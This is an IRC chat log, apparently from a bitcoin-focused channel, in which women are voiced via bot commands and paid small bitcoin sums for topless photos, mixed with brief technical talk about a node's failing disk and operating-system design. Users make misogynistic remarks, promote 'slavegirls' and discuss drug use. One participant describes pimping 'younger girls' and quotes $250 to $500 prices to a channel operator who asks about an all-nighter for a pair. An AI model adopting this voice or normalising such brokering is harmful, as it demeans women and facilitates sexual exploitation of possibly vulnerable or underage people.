1797947;1523586472;mircea_popescu;http://btcbase.org/log/2018-04-12#1797879 << well, it does suggest the solution to the cold fusion problem : MAKE THE ITEM MOVE WITH ROCKET!!1 1797948;1523586472;a111;Logged on 2018-04-12 21:38 asciilifeform: whether it is possible to create this condition mechanically, purely from result of vehicle's motion -- i do not know 1797949;1523586646;mircea_popescu;http://btcbase.org/log/2018-04-13#1797925 << defo publish all this, then. or is it published already ? 1797950;1523586646;a111;Logged on 2018-04-13 00:42 zx2c4: spyked: http://btcbase.org/log/2018-04-12#1797801 tamarin (and cryptoverif and proverif) spit out the proof too. tamarin has a nice mode that will draw diagrams and flow charts too to make it easier to digest the proofs. people even have scripts to convert the output into latex in case you want an academic paper for free... 1797951;1523589864;mircea_popescu;!!up fmlrenln 1797952;1523589865;deedbot;fmlrenln voiced for 30 minutes. 1797953;1523591484;douchebag;!!up tittybang 1797954;1523591485;deedbot;tittybang voiced for 30 minutes. 1797955;1523591495;tittybang;hey 1797956;1523591502;tittybang;titties ? 1797957;1523591508;mircea_popescu;lol aite. 1797958;1523591516;tittybang;!!register http://p.bvulpes.com/pastes/Cochh/?raw=true 1797959;1523591519;deedbot;557D9486765678B52BA698560040F7B6EE331885 registered as tittybang. 1797960;1523591530;mircea_popescu;51fd3dda 1797961;1523591637;mircea_popescu;!!up vdstzt 1797962;1523591638;deedbot;vdstzt voiced for 30 minutes. 1797963;1523592244;ckang;!!up shivalry 1797964;1523592245;deedbot;shivalry voiced for 30 minutes. 1797965;1523592264;shivalry;Hi here for boobs 1797966;1523592332;shivalry;mircea_popescu: ^ 1797967;1523592422;deedbot;http://trilema.com/2018/take-a-pacific-piss-like-a-boss/ << Trilema - Take a Pacific piss like a boss. 1797968;1523593039;mircea_popescu;aite, 5a16fb77 shinohai 1797969;1523593044;mircea_popescu;i mean shivalry 1797970;1523593101;shivalry;Ty 1 min 1797971;1523593306;mircea_popescu;eh what is all this bs with taking > half an hour to produce a pic. 1797972;1523593319;mircea_popescu;ima start making them redo if they manage to get devoiced. 1797973;1523593687;douchebag;because women are idiots 1797974;1523593716;mircea_popescu;!!up tittybang 1797975;1523593717;deedbot;tittybang voiced for 30 minutes. 1797976;1523593717;douchebag;i tell them to hurry the fuck up 1797977;1523593749;douchebag;and then they take for fuckever every 1797978;1523593965;shivalry;https://usercontent.irccloud-cdn.com/file/RVnelIYH/image.png 1797979;1523594009;mircea_popescu;!!pay shivalry 0.02 1797980;1523594017;deedbot;Get your OTP: http://p.bvulpes.com/pastes/60nvj/?raw=true 1797981;1523594021;trinque;technically that one has 3 tits. what a steal. 1797982;1523594034;mircea_popescu;shivalry where'd you get the eyes so big! 1797983;1523594054;mircea_popescu;!!up shivalry 1797984;1523594055;deedbot;shivalry voiced for 30 minutes. 1797985;1523594064;shivalry;Are they really that big? like bugs? 1797986;1523594085;mircea_popescu;in the greek tradition, they're outright oxen sized! 1797987;1523594096;mircea_popescu;(i kid you not, ox-eyed was a compliment 3k years ago) 1797988;1523594138;shivalry;In Asia they have surgery for big eyes I believe 1797989;1523594148;mircea_popescu;i believe. 1797990;1523594157;mircea_popescu;so what do you do, other than having big eyes ? 1797991;1523594170;shivalry;Waitress 1797992;1523594188;shivalry;Hard sometimes but tips well. 1797993;1523594211;shivalry;You? 1797994;1523594221;mircea_popescu;i mostly tell people what not to do. 1797995;1523594235;shivalry;😛 1797996;1523594246;shivalry;Any suggestions? 1797997;1523594254;mircea_popescu;well, i don't know you well enough. 1797998;1523594445;shivalry;Do you live a Christian lifestyle? 1797999;1523594512;mircea_popescu;nopr. do you ? 1798000;1523594524;shivalry;Nope. Sin is too much fun 1798001;1523594746;mircea_popescu;so what do you do for sin ? 1798002;1523594775;shivalry;Sex, lust, chemicals 1798003;1523594844;mircea_popescu;anything published ? 1798004;1523594878;shivalry;I've only done this for BFs so unless they put them somewhere, not to my knowledge. 1798005;1523594897;mircea_popescu;aha 1798006;1523594978;shivalry;Do you alter your mind ever? 1798007;1523594994;mircea_popescu;well, i change my mind on occasion, but alter it ? not really. 1798008;1523595021;shivalry;LSD? 1798009;1523595032;mircea_popescu;not this decade. 1798010;1523595045;shivalry;😄 so before 1798011;1523595073;mircea_popescu;why, is it important ? 1798012;1523595088;shivalry;Nope, I just like to see how people look at such things 1798013;1523595101;mircea_popescu;i'm kinda happy with my mind as it is, myself. 1798014;1523595113;shivalry;Abstinence vs moderation 1798015;1523595123;mircea_popescu;more a case of disinterest. 1798016;1523595162;shivalry;I believe the mind can be made malleable again under the right circumstances. 1798017;1523595183;mircea_popescu;malleable in what sense ? as in childhood malleable ? 1798018;1523595202;shivalry;Learning, understanding abstracts 1798019;1523595226;shivalry;We shell ourselves off with age and our thoughts become cemented. 1798020;1523595230;mircea_popescu;leaving aside the very obvious "why on earth would you want something like that", it's a matter of certainty that no such wonder is chemically achievable. 1798021;1523595300;shivalry;What about psychotherapy ? MDMA in a clinical environment for PTSD 1798022;1523595308;mircea_popescu;wank. 1798023;1523595329;mircea_popescu;consider a simple and more obvious case : taking a specialized cell and convincing it to revert to stem situation. 1798024;1523595377;mircea_popescu;this is not possible, very strictly, because specialization happens in a single enthalpic direction : through information loss. no specialized cell will ever be a stem cell again, exactly in the way no broken glass will become the glass it was again. 1798025;1523595388;mircea_popescu;now, you CAN induce chemically something very much like stem situation. 1798026;1523595393;mircea_popescu;this is known as cancer. 1798027;1523595412;shivalry;I suppose the retardation is more difficult, similar to something thats been oxidized. 1798028;1523595418;mircea_popescu;and yes, you have carcinogenic substances, which make specialized cells "malleable". it's never superpowers, though. 1798029;1523595422;mircea_popescu;it's always a sad miserable death. 1798030;1523595480;shivalry;Ive seen this work out poorly though, yes 1798031;1523595483;mircea_popescu;there's no good reason to suspect the above model is not exactly the case with neurons and neotenification. moreover, there's EXCELLENT reason to suspect the interest is quite psychogenic. 1798032;1523595541;shivalry;It shouldn't be used as the sole means but rather a tool is where people get it misunderstood. 1798033;1523595665;mircea_popescu;so the good talk therapist would point out to the person interested in this particular magic pill exactly what he'd say to the "i want ai because i don't have a gf" nut : "have you tried the NATURALLY OCCURING solutions first ?" 1798034;1523595683;mircea_popescu;rather than trying to revert to an imagined childhood to resolve whatever frustation/block, how about just being an adult. 1798035;1523595727;shivalry;Sometimes ego death has benefits though. 1798036;1523595745;mircea_popescu;in any case, without exception known or possible, the adult that hallucinates childhood as a preferrable state has ~other~ issues. 1798037;1523595763;mircea_popescu;shivalry almost every time, which is why slavegirls. 1798038;1523595805;mircea_popescu;but this is principally a measure of how broken the society they come from actually is. 1798039;1523595813;shivalry;Slavegirls, can you explain how that works? 1798040;1523595823;shivalry;You actually buy them outright? 1798041;1523595829;mircea_popescu;what buy. they volunteer. 1798042;1523595836;shivalry;Oic 1798043;1523595853;shivalry;What does that situation look like, dynamics wise? 1798044;1523595882;mircea_popescu;!!up shivalry 1798045;1523595883;deedbot;shivalry voiced for 30 minutes. 1798046;1523595906;mircea_popescu;mmm. like http://trilema.com/2017/why-would-any-girl-want-to-be-a-slave/ i guess ? or http://trilema.com/2010/nsfw-mosu-cu-joarda/ ? 1798047;1523595911;shivalry;I would like some slave boys 😍 1798048;1523595916;mircea_popescu;why lol. 1798049;1523595919;mircea_popescu;!!rate shivalry 1 waitress 1798050;1523595922;deedbot;Get your OTP: http://p.bvulpes.com/pastes/7K3dO/?raw=true 1798051;1523595961;shivalry;Idk, the idea of someones life revolving around appeasing me. Seems powerful feeling. 1798052;1523595983;mircea_popescu;i guess. seems like a shitty reason though. 1798053;1523595997;shivalry;I suppose it goes both ways though too... 1798054;1523596011;shivalry;I am just unsure how such a situation works in practice. 1798055;1523596076;shivalry;You need a documentary. Ideas are received better through media sometimes. 1798056;1523596104;mircea_popescu;i guess. 1798057;1523596537;mircea_popescu;asciilifeform check this out man, it's made! retropistol! https://www.youtube.com/watch?v=dTVQDkF0Q_s 1798058;1523596845;shivalry;mircea_popescu: My friend want to do too, can they use this account? 1798059;1523596871;mircea_popescu;notrly, but she could make her own neh ? 1798060;1523596892;shivalry;Yea I have ckang help then. Ty 1798061;1523597610;ckang;!!up lilly_ 1798062;1523597611;deedbot;lilly_ voiced for 30 minutes. 1798063;1523597625;lilly_;Hi, ready to go 1798064;1523597759;lilly_;mircea_popescu: Hello 1798065;1523597793;mircea_popescu;hey there. 1798066;1523597796;mircea_popescu;!!key lilly_ 1798067;1523597798;deedbot;http://wot.deedbot.org/81C24E2047319496E7A75CAEBB75756D799E7CD9.asc 1798068;1523597801;lilly_;:) 1798069;1523597816;mircea_popescu;905362b1 1798070;1523597823;lilly_;Thanks 1798071;1523597991;mircea_popescu;shivalry say !!up to deedbot, it'll voice you. 1798072;1523599623;mircea_popescu;!!up lilly_ 1798073;1523599624;deedbot;lilly_ voiced for 30 minutes. 1798074;1523601133;lilly_;Sorry had a phonecall, same # mircea_popescu ? 1798075;1523601142;lilly_;Or still want? 1798076;1523601175;lilly_;I do this one then brb 1798077;1523602079;mircea_popescu;nah it's ok lilly_ , you'll be famous for the hundred dollar phonecall. neeeext. 1798078;1523604832;ckang;!!up danna33 1798079;1523604833;deedbot;danna33 voiced for 30 minutes. 1798080;1523604859;danna33;mircea_popescu: Ready 1798081;1523618693;deedbot;http://thetarpit.org/posts/y04/06d-what-is-an-os.html << The Tar Pit - What is an operating system? 1798082;1523625245;asciilifeform;!!up ascii_lander 1798083;1523625246;deedbot;ascii_lander voiced for 30 minutes. 1798084;1523625255;ascii_lander;!!register http://p.bvulpes.com/pastes/uD7Fi/?raw=true 1798085;1523625259;deedbot;9AC2C92DC81DF86C575819F93F37D38EAF9EDE6C registered as ascii_lander. 1798086;1523625340;asciilifeform;!!rate ascii_lander 1 asciilifeform's lander module, 4.14 -- 4.19 1798087;1523625343;deedbot;Get your OTP: http://p.bvulpes.com/pastes/ooK8u/?raw=true 1798088;1523625365;asciilifeform;!!v 182DA324B828FAFD816A51AA834435D93C12B0D9F974B7346F8B84D8992497B4 1798089;1523625366;deedbot;asciilifeform rated ascii_lander 1 << asciilifeform's lander module, 4.14 -- 4.19 1798090;1523629795;BingoBoingo;So there is a very small fraction of the people normally at the CoWork on Fridays here. I can't tell if it is because it is Friday the 13th or if it is the Mumps outbreak. 1798091;1523631023;deedbot;http://qntra.net/2018/04/russia-preparing-economic-sanctions-against-us-industry/ << Qntra - Russia Preparing Economic Sanctions Against US Industry 1798092;1523632033;diana_coman;http://btcbase.org/log/2017-08-04#1694066 <-- experimental indecent (no ssd, no sata3) node has kept reliably at top for > 2 months after installing asciilifeform's aggressive pushget blocks patch; conclusion so far: can be indecent IF only aggressive too! 1798093;1523632033;a111;Logged on 2017-08-04 22:56 asciilifeform: and this is true of pretty much any box that makes decent trb node (i.e. has sata3 + ssd ) 1798094;1523632512;mod6;thanks for the update diana_coman. i've been running with that patch too -- I've had some falling behind I believe not related to his vpatch, and instead related to ssd disk flakyness (as detailed in last month's SoBA). 1798095;1523632540;mod6;I did a core dump, and the call stack seems to indicate when I'm "stuck", it's stuck in an lseek() call. 1798096;1523632802;mod6;That's all I've got. Here's a link to that if curious: http://logs.bvulpes.com/trilema-mod6?d=2018-4-30 1798097;1523632815;BingoBoingo;Generally since aggression nodes began the trb ecosystem has been much more sync'd from my perch. 1798098;1523632828;mod6;The disassembly linked in there is gone now, reposted here: http://p.bvulpes.com/pastes/eT1BM/?raw=true 1798099;1523633463;diana_coman;mod6, fwiw I'm again locked out of trilema-mod6 ("channel is invite only") 1798100;1523633716;mod6;oh my bad 1798101;1523633783;mod6;there ya go 1798102;1523633802;diana_coman;yay, thanks! 1798103;1523633815;deedbot;http://qntra.net/2018/04/ingsoc-today-british-baker-under-assault-for-eschewing-metric-system/ << Qntra - Ingsoc Today: British Baker Under Assault For Eschewing Metric System 1798104;1523633982;diana_coman;mod6, I had a look at that dump but sadly I can't say I get what's going on exactly atm 1798105;1523634244;mod6;ok np 1798106;1523634253;mod6;thanks for taking a peek at the disasm 1798107;1523634269;mod6;i do have core files available if you request them. will pgp-gram them to you, rather large tho. 1798108;1523635009;danielpbarron;http://btcbase.org/log/2018-04-13#1797998 << heh, a response to "i tell people what not to do" -- shivalry, did you know the Bible tells us to encourage your indulgences for so long as God hasn't forced you to believe in Him? 1798109;1523635009;a111;Logged on 2018-04-13 04:40 shivalry: Do you live a Christian lifestyle? 1798110;1523635018;mircea_popescu;http://btcbase.org/log/2018-04-13#1798080 << how about now ? 1798111;1523635018;a111;Logged on 2018-04-13 07:34 danna33: mircea_popescu: Ready 1798112;1523635021;mircea_popescu;!!up danna33 1798113;1523635022;deedbot;danna33 voiced for 30 minutes. 1798114;1523635066;mircea_popescu;danielpbarron amusingly enough, the argument can well be brought that the seeking lost are closer than the content. 1798115;1523635068;danielpbarron;!~bible pro 31:6 1798116;1523635069;jhvh1;danielpbarron: [KJV] Proverbs 31:6 :: Give strong drink unto him that is ready to perish, and wine unto those that be of heavy hearts. 1798117;1523635156;danielpbarron;mircea_popescu, yes i was just discussing that yesterday. the lost man who thinks his life sucks verses the lost man who thinks his life is great : the former is at least one step closer to the truth of the matter 1798118;1523635171;mircea_popescu;by the time some waitress somewhere's willing to try just about any chemsludge in the hope she might extract herself from the imposition of the world as she perceives it, you'd be at serious pains to show her much of a sinner. 1798119;1523635203;mircea_popescu;but of course, the methodist heresy is strong in our colonies, they imagine sin is the form of sin to avoid looking at the substance of anything. 1798120;1523635248;danielpbarron;!~bible rom 3:23 1798121;1523635250;jhvh1;danielpbarron: [KJV] Romans 3:23 :: For all have sinned, and come short of the glory of God; 1798122;1523635258;danielpbarron;not so painful there 1798123;1523635299;mircea_popescu;well yes in that sense. 1798124;1523635327;mircea_popescu;but i said ~much~ of a sinner. 1798125;1523635445;danielpbarron;drunkards wills not inherit the kingdom of God; a lost man is not saved by drinking a lot -- the strong drink offer is twofold: if you are going to perish (burn in hell), you might as well enjoy life now ; and, maybe in your drunkeness you will see the folly of your lifestyle, and turn to God 1798126;1523635518;mircea_popescu;the brief discussion supports the interpretation, her justification ultimately was "maybe i find something". 1798127;1523635539;mircea_popescu;!!up shivalry 1798128;1523635540;deedbot;shivalry voiced for 30 minutes. 1798129;1523635542;danielpbarron;but the lost man is not saved by his abstinence either 1798130;1523635562;mircea_popescu;wb diana_coman ! 1798131;1523635571;danielpbarron;and in living what he imagines to be a righteous lifestyle, is perhaps less likely to turn to the truth 1798132;1523635574;diana_coman;thanks mircea_popescu ! 1798133;1523635592;mircea_popescu;how was teh wilderness ? 1798134;1523635672;diana_coman;the one in the woods quite as usual if changed for the usual erosion that has been going on in that area ever since I know it; the town-wilderness was somehow sad beyond description 1798135;1523635690;mircea_popescu;in other news, http://www.jo99.fr/ << check out the "game" this artist chick came up with. it's something else. 1798136;1523635827;diana_coman;for all the supposed Easter and all the supposed town, it felt for the first time like the villages in Baragan; possibly part of the explanation it's also the first time I saw queues (as in actual queues, more than 20 people) at the ..."currency exchange and pawn shop" places 1798137;1523635837;mircea_popescu;heh 1798138;1523635898;mircea_popescu;"why bother do anything anymore" right. nuts. 1798139;1523635908;diana_coman;ugh, barfs that I don't have flash I suppose 1798140;1523635944;mircea_popescu;why'd someone package a "click through my art" in flash is anyone's guess. wtf the parasitosis! 1798141;1523635963;diana_coman;yes, a very palpable sense of "why bother do anything anymore" / "no hope, no tomorrow, no nothing" sort of thing 1798142;1523635994;mircea_popescu;diana_coman http://www.jo99.fr/wp-content/uploads/2018/04/krystine-and-the-chidren.jpg << sampler. 1798143;1523636024;diana_coman;ah, that part I see; I tried to click on Start... 1798144;1523636043;mircea_popescu;ah, yeah. anyway, it's pretty much a game of puzzle based on that chick's art. 1798145;1523636068;mircea_popescu;meanwhile in spykedisms, 'I further propose that current definitions of the term operating system are ill-conceived, and that the problem of how to properly design a general-purpose operating system is in principle unresolvable, first and foremost because there is no such thing as a "general-purpose operating system"' 1798146;1523636104;diana_coman;ah, ah, I think I know the sort; some inept "story line" in short bits and otherwise still gotta do the clicking for this or for that, either "farm" or "puzzle" or whatevers same thing underneath 1798147;1523636163;douchebag;!!up tittybang 1798148;1523636164;deedbot;tittybang voiced for 30 minutes. 1798149;1523636164;mircea_popescu;it has a decent atmosphere of psychotic terror, but otherwise yes, some evil dood is sucking the life out of chained children to prolong his own. 1798150;1523636175;mircea_popescu;because totally children have like intrinsic value and we give a shit and whatnot. 1798151;1523636179;douchebag;hey I was away when she didn't know how to get revoiced 1798152;1523636188;tittybang;hi hehe 1798153;1523636192;tittybang;what was the code again? 1798154;1523636199;mircea_popescu;jaysus. 1798155;1523636228;mircea_popescu;tittybang 4b656366 << it's good for about half a n hour, don't dilly-dally. 1798156;1523636316;diana_coman;mircea_popescu, hm, the blood they have what; life = vitality there 1798157;1523636326;diana_coman;or at least that was the old idea as far as I know it 1798158;1523636330;mircea_popescu;yawell. 1798159;1523636425;mircea_popescu;spyked how about THIS definition for the operating system : "that set of code that is trusted implicitly". this then makes EVERYTHING on a windows machine operating system, which i contend is right and proper -- the necessary result of opaque monolith systems design is universalization of the os. 1798160;1523636456;mircea_popescu;now then, a "general purpose operating system" is "that set of code which is trusted implicitly", "as long as it makes no particular assumptions about the rest of the code that will run on the machine". 1798161;1523636476;mircea_popescu;the moment we bake in the assumption that "this is a bitcoin node", suddenly the os is no longer gp ; we'll want a special fs in there etc. 1798162;1523636482;shinohai;greets #trilema 1798163;1523636500;shinohai;http://btcbase.org/log/2018-04-13#1798144 <<< only browser game I ever tried resulted in winged cock. 1798164;1523636500;a111;Logged on 2018-04-13 16:14 mircea_popescu: ah, yeah. anyway, it's pretty much a game of puzzle based on that chick's art. 1798165;1523636507;mircea_popescu;other similar assumptions could be baked, "this is a phuctor ; this is a torrents box, etc". but irrespective -- if any is baked it's a special purpose and if none is baked its a general purpose os. 1798166;1523636520;mircea_popescu;hey shinohai 1798167;1523636548;shinohai;hai mircea_popescu how goes 1798168;1523636551;trinque;mircea_popescu: btw, that thing's coming along, gotta slap a kernel and bootloader on it, and we're done. maybe this evening. 1798169;1523636557;mircea_popescu;flying cocks everywhere! 1798170;1523636563;mircea_popescu;trinque cool deal. 1798171;1523636565;shinohai;!~dhxxx 1798172;1523636566;jhvh1;http://btcinfo.sdf.org/library/DHXXX.html 1798173;1523636577;*;trinque afk for a while 1798174;1523636623;mircea_popescu;for instance, i'd very much like a spos for my torrent box -- a fs that only allocates the disk in 1mb chunks would be good ; a better nic driver would be better. 1798175;1523636889;tittybang;https://i.imgur.com/hXIg0Vv.jpg 1798176;1523636949;mircea_popescu;!!pay tittybang 0.02 1798177;1523636955;deedbot;Get your OTP: http://p.bvulpes.com/pastes/kiqgK/?raw=true 1798178;1523636956;mircea_popescu;bang bang 1798179;1523637143;shinohai;hey mircea_popescu that Trixxi girl messaged me on telegram and said she made a gpg key in kleopatra 1798180;1523637233;mircea_popescu;okies ? 1798181;1523637243;mircea_popescu;!!up TrixxC 1798182;1523637244;deedbot;TrixxC voiced for 30 minutes. 1798183;1523637453;TrixxC;hi https://imgur.com/a/eMJBn 1798184;1523637544;mircea_popescu;check out teh sudden productivities. what's that written there TrixxC , minnow ? 1798185;1523637584;mircea_popescu;!!pay TrixxC 0.02 1798186;1523637589;deedbot;Get your OTP: http://p.bvulpes.com/pastes/uw1sx/?raw=true 1798187;1523637605;TrixxC;oh gracias Sr. :) 1798188;1523637723;shinohai;it's raining tits of late. April showers and all i suppose 1798189;1523638068;mircea_popescu;http://btcbase.org/log/2018-04-13#1798095 << might be dying hdd i guess. does it have bad sectors etc ? 1798190;1523638068;a111;Logged on 2018-04-13 15:15 mod6: I did a core dump, and the call stack seems to indicate when I'm "stuck", it's stuck in an lseek() call. 1798191;1523638388;mod6;Here's the output from smartclt against that device: http://p.bvulpes.com/pastes/E8Iml/?raw=true 1798192;1523638514;mircea_popescu;mod6 61 relocation events... i guess it's starting to go the way of rust. 1798193;1523638529;mod6;yeah. and these chumbawumbas also sold me an old ass drive too 1798194;1523638536;mod6;3509 hours 1798195;1523638552;mircea_popescu;oh, it's not in your hands it got that ? 1798196;1523638556;mod6;that's 146 days. mind you, I only had this emplaced in my box in like beginning of march or some such. 1798197;1523638566;mircea_popescu;tsk. 1798198;1523638593;mod6;nope. called dc, was like sweet as pie, "plz put in ssd, or i'll send you one, can you put in?" "yup, we've got one, no problem." 1798199;1523638597;mircea_popescu;well, dcs often reuse disks. 1798200;1523638614;mod6;just was surprised 'tis all. thought it was new, or i would have sent one myself. 1798201;1523638636;mod6;anyway, will take it up with them. but that's probably what i've been chasing for the lsat few weeks. 1798202;1523638642;mircea_popescu;in general anything under warranty is considered perfectly ok. and afaik it's 10k or 20k hours depending. 1798203;1523638666;mircea_popescu;mod6 it might be, i dunno it necessarily is, disk is far from dead-dead. 1798204;1523638698;mod6;I'm still keeping an eye on it. I'm all ears if anyone has any debugging suggestions. 1798205;1523638725;mircea_popescu;mod6 keep an eye on the following item : lseek deaths vs increases of relocation counts. 1798206;1523638727;mod6;(i gleaned 'lseek()' from the 0x8 syscall, not sure if im accurate on that tho) 1798207;1523638748;mircea_popescu;if they go up in step you have a pretty decent empirical reason to use raids like everyone else :D 1798208;1523638761;mod6;lol, ok Sir. Thanks for the advise. 1798209;1523638789;mod6;fwiw, other than this little hiccup, been running great. 1798210;1523638793;mod6;(trb that is) 1798211;1523638836;mircea_popescu;cool deal. 1798212;1523640133;ben_vulpes;http://www.understandfrance.org/France/Education3.html << make web design great again 1798213;1523640711;mircea_popescu;eh, french people. 1798214;1523643411;deedbot;http://qntra.net/2018/04/f-35-deliveries-halted-again-over-defects-and-contract-disputes/ << Qntra - F-35 Deliveries Halted Again Over Defects And Contract Disputes 1798215;1523644113;mircea_popescu;awww 1798216;1523644313;douchebag;yo mp 1798217;1523644315;douchebag;I got a girl 1798218;1523644369;douchebag;!!up thatbitchlola 1798219;1523644370;deedbot;thatbitchlola voiced for 30 minutes. 1798220;1523644377;douchebag;here she is 1798221;1523644446;douchebag;mircea_popescu: 1798222;1523644480;mircea_popescu;o 1798223;1523644493;mircea_popescu;you here to show your tits thatbitchlola ? 1798224;1523644535;thatbitchlola;yesssirie 1798225;1523644612;mircea_popescu;thatbitchlola 563661f6 << it's good for about half a n hour, don't dilly-dally. 1798226;1523645074;ckang;!!up danna33 1798227;1523645076;deedbot;danna33 voiced for 30 minutes. 1798228;1523645101;danna33;mircea_popescu: I am here for the titsforbits 1798229;1523645111;mircea_popescu;a hey there. 1798230;1523645117;danna33;hey 1798231;1523645125;douchebag;https://i.imgur.com/epCvpDz.jpg 1798232;1523645132;douchebag;she texted it to me 1798233;1523645145;thatbitchlola;https://i.imgur.com/epCvpDz.jpg 1798234;1523645149;thatbitchlola;^^^ me ^.^ 1798235;1523645154;mircea_popescu;danna33 52454fae << it's good for about half a n hour, don't dilly-dally. 1798236;1523645200;mircea_popescu;!!pay thatbitchlola 0.02 1798237;1523645206;deedbot;Get your OTP: http://p.bvulpes.com/pastes/Ptqvs/?raw=true 1798238;1523645349;mircea_popescu;so what do you do for a living thatbitchlola ? 1798239;1523645363;thatbitchlola;i do everything 1798240;1523645457;mircea_popescu;everything like what ? 1798241;1523645491;thatbitchlola;i used to be a prostitute, now i pimp out the younger girls 1798242;1523645514;mircea_popescu;so how much for the pair ? 1798243;1523645551;thatbitchlola;depends on the girl and what the guy is into 1798244;1523645570;mircea_popescu;so give me a rough idea ? 1798245;1523645595;danna33;https://usercontent.irccloud-cdn.com/file/MmO18MBi/image.png 1798246;1523645620;mircea_popescu;:) right back at you danna33 lol 1798247;1523645626;mircea_popescu;!!pay danna33 0.02 1798248;1523645630;deedbot;Get your OTP: http://p.bvulpes.com/pastes/WS75K/?raw=true 1798249;1523645634;danna33;thanks ! 1798250;1523645646;thatbitchlola;out of my girls 1798251;1523645646;danna33;terrorist? 1798252;1523645649;thatbitchlola;they will do anything 1798253;1523645654;mircea_popescu;danna33 aan' what do you do for a living ? 1798254;1523645654;thatbitchlola;if the price is right 1798255;1523645656;danna33;explain please 1798256;1523645671;mircea_popescu;thatbitchlola what area code is this ? 1798257;1523645692;mircea_popescu;danna33 like http://btcbase.org/log/2018-04-12#1797448 1798258;1523645692;a111;Logged on 2018-04-12 17:27 mircea_popescu: zx2c4 the good news is that i am now finally in a position to explain what EXACTLY is meant by "terrorist" : that feeling in http://btcbase.org/log/2018-04-12#1797417 when shit keeps coming and coming and coming up. what is it, if not spiritual terror ? 1798259;1523645900;danna33;it looks like it references itself 1798260;1523645926;mircea_popescu;nah, different lines. 1798261;1523645930;mircea_popescu;!!key thatbitchlola 1798262;1523645932;deedbot;http://wot.deedbot.org/734A00DE7C6C678CDA9952A16DF429AB89BA2F89.asc 1798263;1523645983;thatbitchlola;I used to sell heroin to douchebag same area as him 1798264;1523645997;BingoBoingo;danna33: You are looking at the wrong side of the pointer. Gotta rotate it 45 degrees to your right 1798265;1523646008;mircea_popescu;thatbitchlola do you understand why you need crypto in your line ? 1798266;1523646056;thatbitchlola;yeah he was telling me how he used to buy bitcoin for 250 per 1798267;1523646081;thatbitchlola;and then he showed me the price of bitcoin and its like 8000 now! wtf whyy??? 1798268;1523646097;mircea_popescu;bitcoin is a separate consideration. you know what this is : http://wot.deedbot.org/734A00DE7C6C678CDA9952A16DF429AB89BA2F89.asc ? 1798269;1523646141;thatbitchlola;he explained how this is how to secure communications that the feds cant crack 1798270;1523646156;mircea_popescu;or anyone else for that matter. 1798271;1523646182;mircea_popescu;!!up thatbitchlola 1798272;1523646184;deedbot;thatbitchlola voiced for 30 minutes. 1798273;1523646239;mircea_popescu;so now... you're still not going to say how much the all-nighter is for a pair ? 1798274;1523646268;thatbitchlola;$250-$500 depending on girl 1798275;1523646280;BingoBoingo;Pesos or U$D 1798276;1523646320;thatbitchlola;USD 1798277;1523646393;BingoBoingo;Then specify it por favor. Stahp spreading Chicago centricism and marginalizing rural voices. 1798278;1523646462;mircea_popescu;lol 1798279;1523646480;mircea_popescu;thatbitchlola and gotta come over to see the girls ? 1798280;1523646600;deedbot;http://www.thedrinkingrecord.com/2018/04/13/fucking-starbucks/ << Bingo Blog - Fucking Starbucks 1798281;1523646751;douchebag;SluttyDiamond: is here for tits too 1798282;1523646779;douchebag;!!up SluttyDiamond 1798283;1523646780;deedbot;SluttyDiamond voiced for 30 minutes. 1798284;1523646793;SluttyDiamond;heyyyy lol im here to show my tits 1798285;1523646836;douchebag;mircea_popescu: is the one you need to talk to 1798286;1523646862;hanbot;douchebag what's with the overbearing announcement of each and every chick you invite in here? 1798287;1523646881;mod6;welcome to irc.bitcoin-nipples.net 1798288;1523646902;douchebag;hanbot: ? 1798289;1523646904;douchebag;wym 1798290;1523646910;douchebag;i got a bunch interested right now 1798291;1523646916;douchebag;and i refer them here 1798292;1523646926;ben_vulpes;and clearly none of them can type on their own 1798293;1523646936;hanbot;it's pretty clear why they're here, between their saying so and their own statement of purpose. why do you put 1 - 5 lines of announcement for every.single.one? 1798294;1523646942;hanbot;are you just excited? 1798295;1523646961;hanbot;err, between their names and their own statement of purpose. 1798296;1523646992;mircea_popescu;SluttyDiamond 2fb5eb10 << it's good for about half a n hour, don't dilly-dally. 1798297;1523647014;hanbot;douchebag : just sayin', a lot of people read these logs. it gets tedious reading the announcement over and over again. 1798298;1523647059;douchebag;forsure, apologies 1798299;1523647062;mircea_popescu;tit streamlinin'. 1798300;1523647069;hanbot;thx douchebag 1798301;1523647110;mircea_popescu;douchebag so did we mostly see thatbitchlola 's stable, or are these actually unrelated caches ? 1798302;1523647134;thatbitchlola;elaborate? 1798303;1523647158;mircea_popescu;thatbitchlola http://trilema.com/2014/ill-pay-for-your-tits/ << recognize any of the tits there ? 1798304;1523647207;thatbitchlola;he showed me that link 1798305;1523647224;mircea_popescu;alright ; so they your girls or not ? 1798306;1523647230;thatbitchlola;oh no 1798307;1523647252;mircea_popescu;so then what's yo lazy ass waiting for, get the hos writing neh! 1798308;1523647277;thatbitchlola;SluttyDiamond: is my girl 1798309;1523647297;mircea_popescu;that way you can move into the future, conduct your negotiations as "three bitcents for 9348aafb and 2.5 bitcents for ffa03994" 1798310;1523647310;mircea_popescu;will give the old farts in the chicago senate heartburn. 1798311;1523647420;thatbitchlola;wait so I get extra for my girls? 1798312;1523647468;BingoBoingo;!!up haleyyyyy 1798313;1523647469;deedbot;haleyyyyy voiced for 30 minutes. 1798314;1523647476;haleyyyyy;Greetz :) 1798315;1523647476;BingoBoingo;haleyyyyy: Who is your daddy and what does he do? 1798316;1523647489;haleyyyyy;btc my daddy he likes tits 1798317;1523647500;mircea_popescu;thatbitchlola well, you get the publicity value. 1798318;1523647532;hanbot; will give the old farts in the chicago senate heartburn. << haha there's a fact 1798319;1523647555;haleyyyyy;mircea_popescu: Hi 1798320;1523647566;mircea_popescu;haleyyyyy 96ddc81a << it's good for about half a n hour, don't dilly-dally. 1798321;1523647595;mircea_popescu;hanbot these are gonna become incantations lol. "hi i'm here to show you my tits" "<< it's good for about half a n hour, don't dilly-dally." and so on. 1798322;1523647606;mircea_popescu;ad-hoc specification of titbit faucet api! 1798323;1523647630;*;mircea_popescu 's experimentation in wetware computing & networking is proceeding apace. 1798324;1523647679;thatbitchlola;https://i.imgur.com/YVLl0kO.jpg 1798325;1523647711;thatbitchlola;i took that picture for SluttyDiamond 1798326;1523647732;SluttyDiamond;that's me lol 1798327;1523647733;mircea_popescu;heh. 1798328;1523647736;mircea_popescu;!!pay SluttyDiamond 0.02 1798329;1523647741;deedbot;Get your OTP: http://p.bvulpes.com/pastes/p0JSX/?raw=true 1798330;1523647992;mircea_popescu;!!up thatbitchlola 1798331;1523647993;deedbot;thatbitchlola voiced for 30 minutes. 1798332;1523648007;BingoBoingo;Estoy esperado Alftime 1798333;1523648013;mircea_popescu;!!rate thatbitchlola 1 ex ho now pimp. 